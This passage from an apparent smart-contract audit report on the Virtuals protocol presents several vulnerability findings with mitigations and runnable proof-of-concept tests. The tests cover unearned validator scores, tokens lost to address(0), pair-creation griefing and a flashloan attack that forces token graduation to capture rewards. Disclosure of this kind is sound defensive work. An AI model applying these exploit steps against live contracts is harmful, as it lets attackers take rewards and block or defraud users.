// . . . Rest of the code . . .
for (uint i = 0; i < services.length; i++) {
serviceId = services[i];
impact = serviceNftContract.getImpact(serviceId); <<@ -- // Uses getImpact
if (impact == 0) {
continue;
}
ServiceReward storage serviceReward = _serviceRewards[serviceId];
if (serviceReward.impact == 0) {
serviceReward.impact = impact;
}
_rewardImpacts[reward.id][serviceNftContract.getCore(serviceId)] += impact;
}
// . . . Rest of the code . . .
}- The
Minter::mintuses theServiceNft::getImpactcall to transfer tokens; hence, leading to excess or lower funds being transferred.
function mint(uint256 nftId) public noReentrant {
// . . . Rest of the code . . .
uint256 finalImpactMultiplier = _getImpactMultiplier(virtualId);
uint256 datasetId = contribution.getDatasetId(nftId);
uint256 impact = IServiceNft(serviceNft).getImpact(nftId); <<@ -- // Uses getImpact
if (impact > maxImpact) {
impact = maxImpact;
}
uint256 amount = (impact * finalImpactMultiplier * 10 ** 18) / DENOM;
uint256 dataAmount = datasetId > 0
? (IServiceNft(serviceNft).getImpact(datasetId) * finalImpactMultiplier * 10 ** 18) / DENOM
: 0;
// . . . Rest of the code . . .
}AgentDAO::_calcMaturityusesContributionNft::getCorewhich would calculate incorrect core allowing to manipulatecoreService:
function _calcMaturity(uint256 proposalId, uint8[] memory votes) internal view returns (uint256) {
address contributionNft = IAgentNft(_agentNft).getContributionNft();
address serviceNft = IAgentNft(_agentNft).getServiceNft();
uint256 virtualId = IContributionNft(contributionNft).tokenVirtualId(proposalId);
uint8 core = IContributionNft(contributionNft).getCore(proposalId); <<@ -- // Hence, calculating incorrect core.
uint256 coreService = IServiceNft(serviceNft).getCoreService(virtualId, core);
// All services start with 100 maturity
uint256 maturity = 100;
if (coreService > 0) {
maturity = IServiceNft(serviceNft).getMaturity(coreService);
maturity = IEloCalculator(IAgentNft(_agentNft).getEloCalculator()).battleElo(maturity, votes);
}
return maturity;
}Recommended mitigation steps
Due to lack of documentation, from my personal understanding the comment helps in inferring that the function was meant to be guarded:
address private _admin; // Admin is able to create contribution proposal without votesAllowing only an operator or admin to call the ContributionNft::mint should mitigate the issue:
require(_msgSender() == _admin, "Only admin can set elo calculator"); function mint(
address to,
uint256 virtualId,
uint8 coreId,
string memory newTokenURI,
uint256 proposalId,
uint256 parentId,
bool isModel_,
uint256 datasetId
) external returns (uint256) {
+ require(_msgSender() == _admin, "Only admin can mint tokens");
IGovernor personaDAO = getAgentDAO(virtualId);Virtuals marked as informative
[H-05] ValidatorRegistry::validatorScore/getPastValidatorScore allows validator to earn full rewards without actually engaging with the protocol
Submitted by oakcobalt, also found by danzero and YouCrossTheLineAlfie
The ValidatorRegistry::_initValidatorScore function initializes new validators with a base score equal to the total number of proposals that have ever existed, allowing validators to earn full rewards without actually participating in the protocol.
Vulnerabilities
When a new validator is added via addValidator(), their base score is set to _getMaxScore(virtualId) which is implemented as totalProposals(virtualId) in AgentNftV2:
function _initValidatorScore(
uint256 virtualId,
address validator
) internal {
_baseValidatorScore[validator][virtualId] = _getMaxScore(virtualId);
}This base score is then added to the validator’s actual participation score in the validatorScore and getPastValidatorScore functions:
function validatorScore(
uint256 virtualId,
address validator
) public view virtual returns (uint256) {
return
_baseValidatorScore[validator][virtualId] +
_getScoreOf(virtualId, validator);
} function getPastValidatorScore(
uint256 virtualId,
address validator,
uint256 timepoint
) public view virtual returns (uint256) {
return _baseValidatorScore[validator][virtualId] + _getPastScore(virtualId, validator, timepoint);
}In AgentRewardV2, rewards are distributed based on participation rate calculated as (validatorRewards * nft.validatorScore(virtualId, validator)) / totalProposals, meaning validators with artificially inflated scores receive unearned rewards.
This allows two exploit scenarios:
- New validators can earn full rewards without ever voting on proposals: Without actually casting votes, a new validator is already entitled to rewards, because their score is non-zero. This is unfair to other validators who might have started voting from the beginning but missed 1 proposal. (See POC)
- Stakers can game the system by delegating to new validators to maintain 100% reward allocation:
In addition to the first scenario above, a staker can delegate to a new validator every time to earn 100% uptime without ever having to vote.
Impacts
- New validators can earn full rewards without ever voting on proposals.
- Stakers can game the system by delegating to new validators to maintain 100% reward allocation.
- Unfair reward distribution that penalizes validators who have actively participated since the beginning.
Recommended mitigation steps
validatorScore and getPastValidatorScore should be based on actual engagement. For example, consider initializing them to 0 and only taking into account scores earned during their engagement.
Proof of Concept
Unit test on exploit scenario (1). Suppose 2 proposals are created. validator 1 votes for the 1st proposal:
validator2is initialized.validator2’sweight == validator1- Check
validator2’s score is 2. (100% uptime). Checkvalidator1’s score is 1. 50% uptime.
See added unit test validators get unearned score, risk of exploits in test/rewardsV2.js:
it.only("validators get unearned score, risk of exploits", async function () {
this.timeout(120000); // 120 seconds
//Test setup: 2 proposal are created. validator 1 votes for the 1st proposal.
//1. validator2 is initialized. validator2's weight == validator1
//2. check validator2's score is 2. (100% uptime). check validator1's score is 1. 50% uptime.
const base = await loadFixture(deployWithAgent);
const { agentNft, virtualToken, agent } = base;
const { founder, contributor1, validator1, validator2 } =
await getAccounts();
// Setup - delegate founder's votes to validator1
const veToken = await ethers.getContractAt("AgentVeToken", agent.veToken);
await veToken.connect(founder).delegate(validator1.address);
await mine(1);
// Create first proposal and have validator1 vote on it
const proposalId1 = await createContribution(
1, // virtualId
0, // coreId
0, // parentId
true, // isModel
0, // no dataset dependency
"First contribution",
base,
contributor1.address,
[validator1], // Only validator1 votes on this proposal
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
);
// Create second proposal but nobody votes on it yet
const proposalId2 = await createContribution(
1, // virtualId
0, // coreId
0, // parentId
true, // isModel
0, // no dataset dependency
"Second contribution",
base,
contributor1.address,
[], // No votes
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
);
// - There are 2 total proposals
// - validator1 has voted on 1 of 2 (50% participation)
// 1. initialize validator2 with equal weight
// Give validator2 some tokens and stake them to get equal voting power
await virtualToken.mint(validator2.address, parseEther("100000"));
// Register validator2 as a new validator
await agentNft.addValidator(1, validator2.address);
// 2. Check validator scores
const validator1Score = await agentNft.validatorScore(
1,
validator1.address
);
const validator2Score = await agentNft.validatorScore(
1,
validator2.address
);
const totalProposals = await agentNft.totalProposals(1);
console.log("Total proposals:", totalProposals.toString());
console.log("Validator1 score:", validator1Score.toString());
console.log("Validator2 score:", validator2Score.toString());
// Validator1 has base score + 1 vote (has actually participated)
expect(totalProposals).to.equal(2);
expect(validator1Score).to.equal(1); // participation (1)
expect(validator2Score).to.equal(2); // validator2 has base score (2) with no participation
// Calculate uptime percentages
const validator1Uptime = (validator1Score * 100n) / totalProposals;
const validator2Uptime = (validator2Score * 100n) / totalProposals;
console.log("Validator1 uptime percentage:", validator1Uptime, "%");
console.log("Validator2 uptime percentage:", validator2Uptime, "%");
// We expect validator2's uptime percentage to be 100% despite not voting on any proposals
expect(validator2Uptime).to.equal(100);
});Test results:
RewardsV2
Total proposals: 2
Validator1 score: 1
Validator2 score: 2
Validator1 uptime percentage: 50n %
Validator2 uptime percentage: 100n %
✔ validators get unearned score, risk of exploits (1547ms)
1 passing (2s)Virtuals marked as informative
[H-06] Missing prevAgentIdupdate in promptMulti() function may cause token loss by transferring to address(0)
Submitted by Vemus, also found by 4ny0n3, bareli, djshan_eden, dustykid, harsh123, Heyu, ks__xxxxx, odessos42, Raihan, and sergei2340
Finding description
The promptMulti() function attempts to optimize token transfers by caching agentTba when the agentId remains unchanged. However, it fails to update prevAgentId inside the loop, which causes agentTba to remain outdated or uninitialized.
As a result, if the first agentId equals the default prevAgentId (0), the contract never sets agentTba before the first transfer, causing a safeTransferFrom(sender, address(0), amount), losing the user’s tokens.
Additionally, when the same agentId reoccurs after a different one, agentTba may point to the wrong address, resulting in unexpected transfers.
Recommended mitigation steps
Consider implementing the following version of the code:
// Initialize prevAgentId to a value that no valid agentId will ever match,
// ensuring the first iteration always enters the if-block.
uint256 prevAgentId = type(uint256).max;
// Initialize agentTba to a placeholder; it will be set properly on the first iteration.
address agentTba = address(0);
for (uint256 i = 0; i < len; i++) {
uint256 agentId = agentIds[I];
require(amounts[i] > 0, "Amount must be > 0"); // Validate if amounts = 0
// If the agentId changes, fetch the corresponding agent TBA (target address)
if (prevAgentId != agentId) {
agentTba = agentNft.virtualInfo(agentId).tba;
require(agentTba != address(0), "Invalid agent TBA"); // Ensure the target address is valid
prevAgentId = agentId; // Update the cache to reflect the current agentId
}
token.safeTransferFrom(sender, agentTba, amounts[i]);
inferenceCount[agentId]++;
emit Prompt(sender, promptHashes[i], agentId, amounts[i], coreIds[i]);
}Proof of Concept
Assume the following scenario. The loop processes the following values, controlled by user:
agentIds = [0, 1, 0]
amounts = [10, 20, 30]Initialization:
prevAgentId = 0
agentTba = address(0)Iteration 0:
agentId = 0- Check:
if (prevAgentId != agentId)→if (0 != 0)→ FALSE - No update to
agentTba(remainsaddress(0)) - Transfer:
token.safeTransferFrom(sender, address(0), 10)→ User lost 10 tokens unintentionally.
Iteration 1:
agentId = 1- Check:
if (prevAgentId != agentId)→if (0 != 1)→ TRUE agentTbais updated:agentTba = agentNft.virtualInfo(1).tba
→ BUT: prevAgentId is not updated, so it still holds 0
- Transfer:
token.safeTransferFrom(sender, agent1Tba, 20)→ So that’s correct.
Iteration 2:
agentId = 0- Check:
if (prevAgentId != agentId)→if (0 != 0)→ FALSE - No update to
agentTba, which still holds the address for agent 1. - Transfer:
token.safeTransferFrom(sender, agent1Tba, 30)→ Tokens are sent to the wrong agent (agent 1 instead of agent 0).
Root Cause
The condition to fetch a new agentTba relies on prevAgentId being updated after each successful fetch.
-
Because
prevAgentIdis never updated inside the loop, the caching logic becomes broken:- The first transfer may lose tokens (if
agentId == 0and no update is triggered), - Subsequent transfers may send tokens to incorrect agents if agentId switches back and forth.
- The first transfer may lose tokens (if
Virtuals marked as informative
Medium Risk Findings (26)
[M-01] Attacker can prevent user from executing application registered through initFromToken() in AgentFactoryV4.
Submitted by 0x04bytes, also found by 0xShitgem, anchabadze, levi_104, newspacexyz, oakcobalt, Olugbenga, patitonar, RaOne, shui, and YouCrossTheLineAlfie
Finding description
AgentFactoryV4 allowed user to register agent with existing/custom agent token. The flow is divided in two steps:
initFromToken(), where the user populates registration with required metadata.executeApplication(), where the application is executed, setting up agent token, dao and provision liquidity on uniswap v2.
When an application is executed in executeApplication(), the contract will check whether the agent token is custom or not. When the agent token is custom, the contract will skip agent token creation step and instead directly create a new pair on uniswap v2 for liquidity provisioning. To prevent the user from provisioning liquidity before execution, the _createPair() internal function will check the existence of the pair. But this check is not enough because any user can permissionlessly create a new pair without provisioning liquidity. This condition can be used by attacker to prevent user from executing application by simply creating a transaction that calls uniswapV2Factory.createPair(agentToken, assetToken) before the victim calls executeApplication(). The execution will fail because the check require(factory.getPair(tokenAddr, assetToken) == address(0), "pool already exists"); will revert since the pair is already created by the attacker in the previous transaction.
Impact
User that register through initFromToken() unable to execute the application.
Proof of Concept
- The attacker monitor the transaction that calls
agentFactoryV4.initFromToken() - Back-run that transaction with a transaction that calls
uniswapV2Factory.createPair(agentToken, assetToken). - The
executeApplication()now will revert with pool exists error for the given application id.
Recommended Mitigation Steps
Simply verifying uniswapV2Factory.getPair(tokenAddr, assetToken) == address(0)) is not enough. When the token pair exists, it is crucial to check if the totalSupply of LP token is equal to 0. By doing that, we can make sure that there is no liquidity provisioned before the execution.
function _createPair(address tokenAddr) internal returns (address uniswapV2Pair_) {
IUniswapV2Factory factory = IUniswapV2Factory(IUniswapV2Router02(_uniswapRouter).factory());
+ uniswapV2Pair_ = uniswapV2Factory.getPair(tokenAddr, assetToken);
+ // valid only if the pair doesn't exist or the total supply of the pair is 0
+ require((uniswapV2Pair_ == address(0)) || (IUniswapV2Pair(uniswapV2Pair_).totalSupply() == 0), "pool already exists");
- require(factory.getPair(tokenAddr, assetToken) == address(0), "pool already exists");
+ if(uniswapV2Pair_ == address(0)) {
+ uniswapV2Pair_ = factory.createPair(tokenAddr, assetToken);
+ }
return (uniswapV2Pair_);
}[M-02] Missing slippage protection on buy and sell
Submitted by EPSec, also found by 0x1982us, 0x60scs, 0xbc000, 0xterrah, adam-idarrha, b1n4ry, bareli, BlackAdam, BowTiedOriole, bytesguard, chupinexx, classic-k, CoheeYang, Damola0x, danzero, Ejineroz, Eniwealth, gregom, harsh123, jamshed, Jeremias, Kweks, mihailvichev, ngo, NHristov, PolarizedLight, PotEater, pro_king, Rorschach, SeveritySquad, Shinobi, shui, slowbugmayor, ThanatOS, TheCarrot, Vemus, YouCrossTheLineAlfie, and zubyoz
Finding description
The sell and buy functions in the FRouter contract lack a slippage check to ensure that the amountOut (the amount of tokens received after the trade) is not less than a certain percentage of the expected amountOut. Slippage occurs when the price of a token changes between the time a transaction is submitted and when it is executed, often due to low liquidity or high volatility.
Impact
- User Losses: Without a slippage check, users may receive significantly fewer tokens than expected, especially in volatile markets or low-liquidity pools.
- Front-Running Attacks: Malicious actors can exploit the lack of a slippage check by front-running transactions, manipulating the reserves to cause unfavorable price changes for the user.
- Reduced Trust: Users may lose confidence in the platform if they experience unexpected losses due to slippage, harming the platform’s reputation.
- Economic Exploits: Arbitrageurs or bots could exploit the lack of slippage protection to profit at the expense of users, draining liquidity from the pool.
Proof of Concept
- Deploy the
FRoutercontract and initialize it with a factory and asset token. - Set up a pair with low liquidity between
TokenAand the asset token. - Call the
sellorbuyfunction with a largeamountInduring a period of high volatility or low liquidity. - Observe that the
amountOutreceived is significantly lower than expected, with no mechanism to revert the transaction.
Recommended Mitigation Steps
To address this issue, add a slippage check in both the sell and buy functions. The functions should accept a minAmountOut parameter, which specifies the minimum acceptable amountOut. If the actual amountOut is less than minAmountOut, the transaction should revert.
Example fix for the sell function:
function sell(
uint256 amountIn,
address tokenAddress,
address to,
uint256 minAmountOut // Add a parameter for slippage protection
) public nonReentrant onlyRole(EXECUTOR_ROLE) returns (uint256, uint256) {
require(tokenAddress != address(0), "Zero addresses are not allowed.");
require(to != address(0), "Zero addresses are not allowed.");
address pairAddress = factory.getPair(tokenAddress, assetToken);
IFPair pair = IFPair(pairAddress);
IERC20 token = IERC20(tokenAddress);
uint256 amountOut = getAmountsOut(tokenAddress, address(0), amountIn);
// Ensure the amountOut is greater than or equal to minAmountOut
require(amountOut >= minAmountOut, "Slippage exceeded");
token.safeTransferFrom(to, pairAddress, amountIn);
uint fee = factory.sellTax();
uint256 txFee = (fee * amountOut) / 100;
uint256 amount = amountOut - txFee;
address feeTo = factory.taxVault();
pair.transferAsset(to, amount);
pair.transferAsset(feeTo, txFee);
pair.swap(amountIn, 0, 0, amountOut);
if (feeTo == taxManager) {
IBondingTax(taxManager).swapForAsset();
}
return (amountIn, amountOut);
}Similarly, apply the same logic to the buy function by adding a minAmountOut parameter and checking it against the calculated amountOut. This will protect users from unexpected losses due to slippage and improve the overall trading experience.
[M-03] Slippage protection in AgentTax::dcaSell and BondingTax::swapForAsset is calculated at execution time, effectively retrieving the very same price that the trade will be executing at, ultimately providing no protection
Submitted by Jeremias, also found by adam-idarrha, FavourOkerri, joicygiore, maze, mbuba666, odessos42, slowbugmayor, testnate, and vasilishte
Finding description
Automated Market Makers define the price of asset based on a pool of two assets. The ratio at which they exchange, is defined by a curve of constant product. Except when liquidity is proportionally increased for both, the expected behaviour is that as one increases, the other decreases.
In a pair of token A and token B, if a user deposits the first token, the amount he would receive of the second token is defined as the amount of the other token (token B) that we have to take away for their product to remain constant. Thus, every time a swap occurs, prices does even if slightly, change.
Sometimes before a transaction occurs, users could have also called (and executed) a swap before us, adversely affecting the price ratio (and if the liquidity of the pool is low, that might be even more noticeable). This is an adverse situation we call slippage. To protect against that, some protocols take a minimum amount out.
However, this protection only makes sense (as the risk it protects against) from outside the transaction in which it occurs. Because once the transaction is executing, unless we work with reentrant tokens or something akin to that, the price we are going to work with is the same one that is being used to calculate slippage protection.
Calculating a percentage of acceptable loss from a price fetched at the time of execution then is of no use, since that is already the price that we will be exposed to, be it acceptable or not.
In BondingTax, the BondingTax::SwapForAsset function looks like this:
function swapForAsset() public onlyBondingRouter returns (bool, uint256) {
uint256 amount = IERC20(taxToken).balanceOf(address(this));
require(amount > 0, "Nothing to be swapped");
if (amount < minSwapThreshold) {
return (false, 0);
}
if (amount > maxSwapThreshold) {
amount = maxSwapThreshold;
}
address[] memory path = new address[](2);
path[0] = taxToken;
path[1] = assetToken;
@> uint256[] memory amountsOut = router.getAmountsOut(amount, path); //@audit this gets whatever the price already is at execution
require(amountsOut.length > 1, "Failed to fetch token price");
uint256 expectedOutput = amountsOut[1]; //@audit no protection
uint256 minOutput = (expectedOutput * (10000 - _slippage)) / 10000;
try router.swapExactTokensForTokens(amount, minOutput, path, treasury, block.timestamp + 300) returns (
uint256[] memory amounts
) {
emit SwapExecuted(amount, amounts[1]);
return (true, amounts[1]);
} catch {
emit SwapFailed(amount);
return (false, 0);
}
}Here we see that the output is calculated from the price the function fetches at execution time:
@> uint256[] memory amountsOut = router.getAmountsOut(amount, path); //@audit calculated from current price
require(amountsOut.length > 1, "Failed to fetch token price");
uint256 expectedOutput = amountsOut[1]; //@audit expected output is calculated from amountsOut
uint256 minOutput = (expectedOutput * (10000 - _slippage)) / 10000;This protection is insufficient. A similar implementation is tried in AgentTax::dcaSell:
function dcaSell(uint256[] memory agentIds, uint256 slippage, uint256 maxOverride) public onlyRole(EXECUTOR_ROLE) {
require(slippage <= DENOM, "Invalid slippage");
uint256 agentId;
for (uint i = 0; i < agentIds.length; i++) {
agentId = agentIds[i];
TaxAmounts memory agentAmounts = agentTaxAmounts[agentId];
uint256 amountToSwap = agentAmounts.amountCollected - agentAmounts.amountSwapped;
if (amountToSwap > maxOverride) {
amountToSwap = maxOverride;
}
@> uint256 minOutput = ((amountToSwap * (DENOM - slippage)) / DENOM); //@audit slippage is received as a ratio here
@> _swapForAsset(agentId, minOutput, maxOverride); //@audit a ratio over the price at execution
}
}In both cases, the slippage protection is calculated at run-time. And that’s not a good enough protection against strong price or market movements occurring immediately before our call to uniswap is performed.
Impact
The risk at which the protocol is exposed thus, is that price movements could lead to swap being executed at not acceptable prices brought by market dynamics, with no protection. The protocol might lose part of the funds that are meant to go to their treasure in the swap, or creators of sentient categorized agents might lose part of their trading fees earned.
Given that for now there is no public transaction pool in BASE, the severity might be deserving of medium.
Recommended mitigation steps
I think there are more than one considerations to make here.
Given that the purpose of one of these functions AgentTax::DcaSell is executing many swaps in a loop, setting a single slippage protection inside the call could be not ideal, as the transactions run one after the other; and if the last one hits slippage, all of them get a revert (but could be chosen if that behaviour is desired).
Also, the other of the mentioned functions (BondingTax::swapForAsset) is meant to be called by another contract at execution (FRouter::buy and FRouter::sell, to handle fees), thus passing slippage protection parameters as an argument might be difficult.
Some solutions could be:
-
For
AgentTax::DcaSell, use a current starting price associated with aTaxTokenat which execution of swap is acceptable to pass as an argument, and revert if it isn’t met.- To get the current price at execution time,
IUniswapV2Router01::getAmountsOutcould be used, passing a reference value as amount, and then calculating the price from it and the value returned, to compare it with the argument and check slippage.
- To get the current price at execution time,
function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);-
For
BondingTax::swapForAsset:- If the calls inside
FRouter::buyandFRouter::sellcould be removed, the implementation could also be similar as that suggested forAgentTax::DcaSell. - Otherwise, you could set in the contract a minimum acceptable price (or a series of them, if you were to implement many
taxTokens, for both contracts) in which you would consider more important to avoid the slippage lose than having the swap fail in the try-catch.
- If the calls inside
Proof of Concept
BondingTax::SwapForAssetis called by the bondingRouter, to swap ataxTokenfor theAssetToken.- Someone makes a very big swap exactly before the call in relevant pool.
- The call executes.
- We swapped fees cheaply.
- After our swap the price gets a correction rather quickly to its average, but we already made the swap at a disadvantageous price.
And in the other case:
AgentTax::DcaSellis called to process taxes.- Someone makes a very big swap exactly before the call in relevant pool.
- Since slippage protection intends to be calculated at run-time, it never hits, even though the price could have dropped very significantly. So our call executes.
- Swaps are performed successfully, and the protocol and the creators of agents would lose a significant part of their fees.
[M-04] Launched tokens are vulnerable to flashloan attacks forcing premature graduation, allowing reward manipulation
Submitted by oakcobalt, also found by mbuba666
Bonding.sol only allows a launched memecoin to graduate when gradThreshold is met and enough liquidity (assetToken balance) is gained through the investor community trading. This ensures the price stability of the agentToken upon graduation.
The vulnerability is that current implementation allows the investor community trading to be bypassed by flashloan attack. A malicious founder or founder controlled account can force graduate a token with a flashloan and gain exposure to reward emissions.
The key attack vector: buy() memecoin with flashloaned virtual tokens (e.g. from already deployed uniswapV2pairs or other pools with virtual) → sell atomically in newly deployed uniswapV2pair. This forces graduation of a freshly deployed memecoin with no community support.
The key vulnerable code that enable the attack is upwrapToken() which allows converting memecoins to agentTokens do not have any time-based restrictions, allowing atomic unwrap upon graduation. A flashloan loop can be closed atomically through unwrapToken.
//contracts/fun/Bonding.sol
function unwrapToken(address srcTokenAddress, address[] memory accounts) public {
Token memory info = tokenInfo[srcTokenAddress];
require(info.tradingOnUniswap, "Token is not graduated yet");
FERC20 token = FERC20(srcTokenAddress);
IERC20 agentToken = IERC20(info.agentToken);
address pairAddress = factory.getPair(srcTokenAddress, router.assetToken());
for (uint i = 0; i < accounts.length; i++) {
address acc = accounts[i];
uint256 balance = token.balanceOf(acc);
if (balance > 0) {
token.burnFrom(acc, balance);
|> agentToken.transferFrom(pairAddress, acc, balance);//@audit no time restrictions, unwrapToken allows atomic agentToken conversion upon graduation
}
}
}Flows: flashswap/flashloan -> bonding::buy -> bonding::unwrapToken -> uniswapV2router::swapExactTokensForETHSupportingFeeOnTransferTokens -> paypack flashswap/flashloanImpact
- Premature graduation: allowing easy price manipulation through flashloan that bypass community support and liquidity.
- Reward distribution is manipulated: forced graduated token will have Lp values (
getLPValue()) and eligible for reward shares, reducing other legitimateagentTokenrewards. Malicious founder gains rewards and dilute otheragentToken’s rewards. - Market manipulation: the deployed uniswapV2pair through flash loan attack doesn’t have intended liquidity and agent token price stability because uniswapV2pair has unbalanced reserves.
Recommended mitigation steps
Consider enforcing a delay in upwrapToken such that flash loan cannot be closed atomically.
Proof of Concept
Suppose founder launched Cat memcoin from bonding.sol. Attacker can be a founder or a founder controlled account.
- Attacker takes out flashloan (virtual token).
- Attacker uses flashloan to buy memecoin and trigger graduation.
- Unwrap tokens to receive agent tokens.
- Trade agent tokens for virtual tokens in Uniswap pair atomically.
- Attacker paying back flashloan with traded out virtual tokens (only paying extra fees/tax in trading).
- Check that the uniswap LP tokens are automatically staked in veToken.
- Delegate to self to be eligible for rewards.
- Distribute rewards and verify forced graduated agent token receives allocation.
See added unit test flash loan attack force premature graduation, manipulating rewards in test/bonding.js:
it.only("flash loan attack force premature graduation, stealing rewards", async function () {
this.timeout(120000); // 120 seconds
// Setup test environment
const { virtualToken, bonding, fRouter, agentFactory, agentNft } =
await loadFixture(deployBaseContracts);
const { founder, trader, treasury, deployer } = await getAccounts();
// Initial setup - founder launches a memecoin
await virtualToken.mint(founder.address, parseEther("200"));
await virtualToken
.connect(founder)
.approve(bonding.target, parseEther("1000"));
// Launch the token
await bonding
.connect(founder)
.launchFor(
"Cat",
"$CAT",
[0, 1, 2],
"cat memecoin",
"",
["", "", "", ""],
parseEther("200"),
founder.address
);
const tokenInfo = await bonding.tokenInfo(await bonding.tokenInfos(0));
console.log("Token created:", tokenInfo.token);
// Step 1: Attacker takes out flashloan (virtual token)
// Use direct mint to mock flashloan interaction
const flashLoanAmount = parseEther("100000");
await virtualToken.mint(trader.address, flashLoanAmount);
console.log(
"Flash loan acquired:",
formatEther(flashLoanAmount),
"VIRTUAL"
);
// Step 2: Attacker uses flashloan to buy memecoin and trigger graduation
await virtualToken.connect(trader).approve(fRouter.target, flashLoanAmount);
// Record token balances before attack
const initialBalances = {
traderVirtualBefore: await virtualToken.balanceOf(trader.address),
pairVirtualBefore: await virtualToken.balanceOf(tokenInfo.pair),
founderCatBefore: await ethers
.getContractAt("IERC20", tokenInfo.token)
.then((token) => token.balanceOf(founder.address)),
};
console.log("Initial balances:");
console.log(
"- Trader VIRTUAL:",
formatEther(initialBalances.traderVirtualBefore)
);
console.log(
"- Pair VIRTUAL:",
formatEther(initialBalances.pairVirtualBefore)
);
console.log(
"- Founder CAT:",
formatEther(initialBalances.founderCatBefore)
);
// Buy memecoin with flashloaned funds to trigger graduation
await expect(
bonding.connect(trader).buy(parseEther("35000"), tokenInfo.token)
).to.emit(bonding, "Graduated");
// Check if token graduated
const tokenInfoAfterGraduation = await bonding.tokenInfo(
bonding.tokenInfos(0)
);
expect(tokenInfoAfterGraduation.agentToken).to.not.equal(
"0x0000000000000000000000000000000000000000"
);
expect(tokenInfoAfterGraduation.tradingOnUniswap).to.equal(true);
console.log("Agent token created:", tokenInfoAfterGraduation.agentToken);
// Record trader's CAT token balance
const traderCatBalance = await ethers
.getContractAt("IERC20", tokenInfo.token)
.then((token) => token.balanceOf(trader.address));
console.log("Trader CAT balance:", formatEther(traderCatBalance));
// Step 3: Unwrap tokens to receive agent tokens
await bonding
.connect(trader)
.unwrapToken(tokenInfo.token, [trader.address]);
// Check agent token balance after unwrapping
const agentToken = await ethers.getContractAt(
"IERC20",
tokenInfoAfterGraduation.agentToken
);
const traderAgentTokenBalance = await agentToken.balanceOf(trader.address);
console.log(
"Trader agent token balance after unwrap:",
formatEther(traderAgentTokenBalance)
);
// Step 4: Trade agent tokens for virtual tokens in Uniswap pair
// We need to get uniswap pair and router
const uniswapFactory = await ethers.getContractAt(
"IUniswapV2Factory",
process.env.UNISWAP_FACTORY
);
const uniswapPair = await uniswapFactory.getPair(
virtualToken.target,
tokenInfoAfterGraduation.agentToken
);
console.log("Uniswap pair:", uniswapPair);
const uniswapRouter = await ethers.getContractAt(
"IUniswapV2Router02",
process.env.UNISWAP_ROUTER
);
// Approve agent tokens to be spent by router
await agentToken
.connect(trader)
.approve(uniswapRouter.target, traderAgentTokenBalance);
// Swap agent tokens for virtual tokens
await uniswapRouter
.connect(trader)
.swapExactTokensForTokensSupportingFeeOnTransferTokens(
traderAgentTokenBalance,
0, // Accept any amount of tokens
[tokenInfoAfterGraduation.agentToken, virtualToken.target],
trader.address,
Math.floor(Date.now() / 1000) + 60 * 20 // 20 minutes from now
);
// Step 5: Check balances after swap to verify flash loan repayment
const finalVirtualBalance = await virtualToken.balanceOf(trader.address);
console.log(
"Final trader VIRTUAL balance:",
formatEther(finalVirtualBalance)
);
// Verify that trader has enough to repay flash loan
console.log("Flash loan amount:", formatEther(flashLoanAmount));
console.log(
"Difference:",
((flashLoanAmount - finalVirtualBalance) * 100n) / flashLoanAmount
);
// A typical flash loan would require the balance to be >= the loan amount
// Due to fees and taxes, there should be a small difference
// Step 6: Check if the uniswap LP tokens are automatically staked in veToken
// Since this is the first agent created, its ID should be 1
const virtualId = 1;
const lpInfo = await agentNft.virtualLP(virtualId);
console.log("Virtual ID:", virtualId);
console.log("LP token:", lpInfo.pool);
console.log("veToken:", lpInfo.veToken);
// Check LP staking
const veToken = await ethers.getContractAt("AgentVeToken", lpInfo.veToken);
const founderVeTokenBalance = await veToken.balanceOf(founder.address);
console.log("founder veToken balance:", formatEther(founderVeTokenBalance));
// Step 7: Delegate to self to be eligible for rewards
if (founderVeTokenBalance > 0) {
await veToken.connect(founder).delegate(founder.address);
console.log("Trader delegated to self");
}
// Step 8: Distribute rewards and verify allocation
// Deploy rewards contract to verify reward allocation
console.log("Setting up rewards contract for validation...");
const rewardsFactory = await ethers.getContractFactory("AgentRewardV3");
const rewards = await upgrades.deployProxy(rewardsFactory, [
virtualToken.target,
agentNft.target,
{
protocolShares: 1000, // 10%
stakerShares: 9000, // 90%
},
]);
await rewards.waitForDeployment();
// Grant governance role to deployer
await rewards.grantRole(await rewards.GOV_ROLE(), deployer.address);
// Check LP value (should be based on VIRTUAL token in the pool)
const lpValue = await rewards.getLPValue(virtualId);
console.log("LP value for virtualId 1:", formatEther(lpValue));
// Mint some VIRTUAL tokens to distribute as rewards
const rewardAmount = parseEther("10000"); // 10,000 VIRTUAL tokens as rewards
await virtualToken.mint(deployer.address, rewardAmount);
await virtualToken.approve(rewards.target, rewardAmount);
// Distribute rewards
await rewards.distributeRewards(rewardAmount, [virtualId], false);
console.log("Rewards distributed");
// Check rewards allocation
const agentRewardCount = await rewards.agentRewardCount(virtualId);
console.log("Agent reward count:", agentRewardCount.toString());
// Verify rewards were allocated
expect(agentRewardCount).to.be.gt(0);
// Access the first agent reward directly
const agentReward = await rewards.getAgentReward(virtualId, 0);
console.log("Agent reward details:");
console.log("- Staker Amount:", formatEther(agentReward.stakerAmount));
console.log(
"- Validator Amount:",
formatEther(agentReward.validatorAmount)
);
console.log("- Total Staked:", formatEther(agentReward.totalStaked));
// Both stakers and validators receive rewards from the manipulated LP value
expect(agentReward.stakerAmount).to.be.gt(0);
expect(agentReward.validatorAmount).to.be.gt(0);
});See test results:
Bonding
Token created: 0xeC05bC6e8B4DEc3299fA25BDFBd44A43Db415995
Flash loan acquired: 100000.0 VIRTUAL
Initial balances:
- Trader VIRTUAL: 100000.0
- Pair VIRTUAL: 100.0
- Founder CAT: 32258064.516129032258064517
Agent token created: 0x08BD7109ed9c72771A4e494D155e2F31C65205D9
Trader CAT balance: 889001778.003556007112014224
Trader agent token balance after unwrap: 889001778.003556007112014224
Uniswap pair: 0x23457Bea4813642d6f3d4BFDDD461d7f738639cF
Final trader VIRTUAL balance: 97209.656939017097749081
Flash loan amount: 100000.0
Difference: 2n
Virtual ID: 1
LP token: 0x23457Bea4813642d6f3d4BFDDD461d7f738639cF
veToken: 0x75D4c71311994307616350d38f2E832A57440da5
founder veToken balance: 1662461.882480317200970858
Trader delegated to self
Setting up rewards contract for validation...
LP value for virtualId 1: 2890.343060982902250919
Rewards distributed
Agent reward count: 1
Agent reward details:
- Staker Amount: 9000.0
- Validator Amount: 1000.0
- Total Staked: 1662461.882480317200970858
✔ flash loan attack force premature graduation, manipulating rewards (1053ms)
